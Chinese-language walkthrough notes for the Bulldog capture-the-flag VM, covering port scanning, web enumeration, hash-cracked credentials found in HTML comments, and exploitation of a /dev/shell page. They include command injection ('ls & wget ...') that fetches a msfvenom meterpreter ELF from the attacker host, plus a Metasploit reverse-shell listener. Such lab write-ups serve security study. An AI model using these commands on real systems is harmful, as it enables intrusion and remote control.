
扫描不到bulldog主机ip
	【1】从新启动bulldog，到开机页面选择第二个Ubuntu的高级选项。
	【2】进入高级选项，再次选择第二个Linux内核版本的恢复模式回车。
选择root一行回车，进入命令行模式。
输入 ifconfig -a （查看网卡名称）
vim /etc/network/interfaces ，修改网卡名称成步骤查询的结果，保存。
	auto ens33
	iface ens33 inet dhcp
reboot

目标主机IP：192.168.100.149

masscan --rate=10000 --ports 0-65535 192.168.100.149
	Discovered open port 8080/tcp on 192.168.100.149                               
	Discovered open port 80/tcp on 192.168.100.149                                 
	Discovered open port 23/tcp on 192.168.100.149              

nmap -sV -T4 -p 23,80,8080 192.168.100.149
	23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
	80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
	8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)

nmap -O 192.168.100.149
	OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
	OS details: Linux 3.2 - 4.9

whatweb 192.168.100.149
	Bootstrap, Country[RESERVED][ZZ], maybe Django, HTML5, HTTPServer[WSGIServer/0.1 Python/2.7.12], IP[192.168.100.149], JQuery, Python[2.7.12], Script, Title[Bulldog Industries], X-Frame-Options[SAMEORIGIN]    

dirb http://192.168.100.149
	/admin/auth/group , /admin/auth/user , /admin/login , /dev/shell 
	
	http://192.168.100.149/dev/
	Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5--> 
	Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
		nick bulldog
		sarah bulldoglover
		
sudo msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.100.143 LPORT=4444 -b "\x00" -i 10 -f elf -o  /var/www/html/xiao3
ls & wget http://192.168.100.143/xiao3
ls & chmod +x xiao3

	msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.100.143
set LPORT 4444
exploit

